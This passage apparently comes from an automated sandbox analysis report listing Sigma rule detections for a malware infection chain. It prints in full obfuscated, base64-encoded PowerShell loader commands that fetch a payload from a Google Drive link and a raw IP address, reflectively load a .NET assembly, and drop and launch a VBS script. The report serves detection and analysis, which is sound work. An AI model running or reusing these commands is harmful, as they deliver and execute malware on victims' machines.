@(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowse
            Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowse
            Sigma detected: Potentially Suspicious PowerShell Child Processes
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6512, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" , ProcessId: 6408, ProcessName: wscript.exe
            Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0Jysn
            Sigma detected: Suspicious MSHTA Child Process
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))", CommandLine: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICA
            Sigma detected: Suspicious PowerShell Parameter Substring
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6512, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT, ProcessId: 6516, ProcessName: powershell.exe
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6512, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" , ProcessId: 6408, ProcessName: wscript.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 